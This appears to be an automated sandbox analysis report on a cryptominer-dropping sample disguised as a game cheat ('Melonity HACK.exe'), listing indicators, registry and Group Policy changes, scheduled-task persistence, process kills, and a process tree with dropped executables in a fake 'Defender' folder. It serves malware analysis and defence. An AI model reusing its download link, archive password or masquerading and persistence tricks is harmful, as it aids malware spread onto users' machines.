Analysis
-
max time kernel
88s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
19-05-2022 20:02
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
Processes:
Melonity HACK.exeab.exeac1.exeu.exereg.exed.exeac.exemin.execmd.exeab.exed.exed.exeac1.exeac1.exeu.exeWScript.exeStart.exeu.exeac.exeu.execmd.execsc.exetaskkill.exepowershell.exepid process 3932 Melonity HACK.exe 4244 ab.exe 3732 ac1.exe 4136 u.exe 4324 reg.exe 4712 d.exe 2844 ac.exe 1916 min.exe 1932 cmd.exe 2944 ab.exe 5116 d.exe 1172 d.exe 3832 ac1.exe 3468 ac1.exe 1460 u.exe 1488 WScript.exe 3792 Start.exe 4232 u.exe 4284 ac.exe 1812 u.exe 4692 cmd.exe 2236 csc.exe 3688 taskkill.exe 1916 powershell.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1120-221-0x0000000140000000-0x0000000141B39000-memory.dmp vmprotect behavioral1/memory/4856-228-0x0000000140000000-0x0000000141B39000-memory.dmp vmprotect behavioral1/memory/4856-227-0x0000000140000000-0x0000000141B39000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Start.exeac.exeMelonity HACK.execmd.exeab.exeac1.exeac1.exeWScript.exeab.exeac1.exeac.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Start.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ac.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Melonity HACK.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ab.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ac1.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ac1.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ab.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ac1.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation ac.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\Downloads\Melonity HACK.exe autoit_exe C:\Users\Admin\Downloads\Melonity HACK.exe autoit_exe -
Drops file in System32 directory 34 IoCs
Processes:
u.exeu.exeWScript.exereg.exeu.exeu.exedescription ioc process File created C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini WScript.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini reg.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI reg.exe File created C:\Windows\System32\GroupPolicy\User\Registry.pol reg.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol WScript.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol reg.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol WScript.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy WScript.exe File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol reg.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI WScript.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File opened for modification C:\Windows\System32\GroupPolicy reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2480 schtasks.exe 4856 schtasks.exe 4728 schtasks.exe 4320 schtasks.exe 4692 schtasks.exe 2032 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 224 timeout.exe 1152 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 18 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2784 taskkill.exe 2552 taskkill.exe 4880 taskkill.exe 4672 taskkill.exe 3296 taskkill.exe 3752 taskkill.exe 2568 taskkill.exe 2428 taskkill.exe 5000 taskkill.exe 4044 taskkill.exe 3136 taskkill.exe 2944 taskkill.exe 476 taskkill.exe 3688 taskkill.exe 4580 taskkill.exe 3860 taskkill.exe 3688 taskkill.exe 3792 taskkill.exe -
Modifies registry class 6 IoCs
Processes:
Melonity HACK.execmd.exeab.exeMelonity HACK.exeMelonity HACK.exeab.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings Melonity HACK.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings ab.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings Melonity HACK.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings Melonity HACK.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings ab.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exepid process 452 chrome.exe 452 chrome.exe 2348 chrome.exe 2348 chrome.exe 4764 chrome.exe 4764 chrome.exe 4328 chrome.exe 4328 chrome.exe 1212 chrome.exe 1212 chrome.exe 4356 chrome.exe 4356 chrome.exe 1512 chrome.exe 1512 chrome.exe 4024 chrome.exe 4024 chrome.exe 5060 chrome.exe 5060 chrome.exe 2348 chrome.exe 2348 chrome.exe 60 chrome.exe 60 chrome.exe 3284 chrome.exe 3284 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
Processes:
chrome.exepid process 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
Processes:
chrome.exepid process 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
chrome.exepid process 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 2348 wrote to memory of 2884 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 2884 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4932 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 452 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 452 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 4152 2348 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://oxy.name/d/Jmxf1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa05ec4f50,0x7ffa05ec4f60,0x7ffa05ec4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6388 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6020 /prefetch:82⤵
-
C:\Users\Admin\Downloads\Melonity HACK.exe"C:\Users\Admin\Downloads\Melonity HACK.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"4⤵
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"3⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
